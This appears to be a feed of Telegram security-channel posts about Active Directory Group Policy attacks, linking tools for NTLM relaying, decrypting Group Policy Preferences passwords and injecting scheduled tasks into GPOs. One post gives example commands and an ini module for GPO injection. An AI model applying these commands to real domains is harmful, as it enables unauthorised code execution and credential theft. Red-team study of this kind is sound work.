This media is not supported in your browser
VIEW IN TELEGRAM
🔄 Active Directory GPOs through NTLM relaying, and more!
Learn about a attack vector that exploits GPOs through NTLM relaying, potentially allowing unauthenticated attackers to abuse.
🌐 Source:
https://www.synacktiv.com/publications/gpoddity-exploiting-active-directory-gpos-through-ntlm-relaying-and-more
#ad #gpo #relay #ntlm
Learn about a attack vector that exploits GPOs through NTLM relaying, potentially allowing unauthenticated attackers to abuse.
🌐 Source:
https://www.synacktiv.com/publications/gpoddity-exploiting-active-directory-gpos-through-ntlm-relaying-and-more
#ad #gpo #relay #ntlm
🔥10👍3
📜 DGPOEdit
Disconnected GPO Editor - A Group Policy Manager launcher to allow editing of domain GPOs from non-domain joined machines
🔗 Source:
https://github.com/CCob/DGPOEdit
#ad #windows #gpo #policy
Disconnected GPO Editor - A Group Policy Manager launcher to allow editing of domain GPOs from non-domain joined machines
🔗 Source:
https://github.com/CCob/DGPOEdit
#ad #windows #gpo #policy
GitHub
GitHub - CCob/DRSAT: Disconnected RSAT - A method of running Group Policy Manager, Certificate Authority and Certificate Templates…
Disconnected RSAT - A method of running Group Policy Manager, Certificate Authority and Certificate Templates MMC snap-ins from non-domain joined machies - CCob/DRSAT
🔥6👍2
A cross-platforms tool to find and decrypt Group Policy Preferences passwords from the SYSVOL share using low-privileged domain accounts.
🚀 Features:
— Only requires a low privileges domain user account.
— Automatically gets the list of all domain controllers from the LDAP.
— Finds all the Group Policy Preferences Passwords present in SYSVOL share on each domain controller.
— Decrypts the passwords and prints them in cleartext.
— Outputs to a Excel file.
🔗 Source:
https://github.com/p0dalirius/FindGPPPasswords
#ad #windows #gpo #credentials
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥15👍5❤4🤔1
Forwarded from Whitehat Lab
GitHub
GitHub - synacktiv/GroupPolicyBackdoor: Group Policy Objects manipulation and exploitation framework
Group Policy Objects manipulation and exploitation framework - synacktiv/GroupPolicyBackdoor
Инструмент пост эксплуатации для различных манипуляций с GPO. Написан на
Впервые представлена на DEFCON 33
Примеры:
#backup
python3 gpb.py restore backup -d 'corp.com' -o './my_backups' --dc ad01-dc.corp.com -u 'john' -p 'Password1!' -n 'TARGET_GPO'
#inject
python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO'
Пример ini:
[MODULECONFIG]
name = Scheduled Tasks
type = computer
[MODULEOPTIONS]
task_type = immediate
program = cmd.exe
arguments = /c "whoami > C:\Temp\poc.txt"
[MODULEFILTERS]
filters =
[{
"operator": "AND",
"type": "Computer Name",
"value": "ad01-srv1.corp.com"
}]
GPO creation, deletion, backup and injections
Various injectable configurations, with, for each, customizable options (see list in the wiki)
Possibility to remove injected configurations from the target GPO
Possibility to revert the actions performed on client devices
GPO links manipulation
GPO enumeration / user privileges enumeration on GPOs
#gpo #redteam #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11👍5🔥4🤔1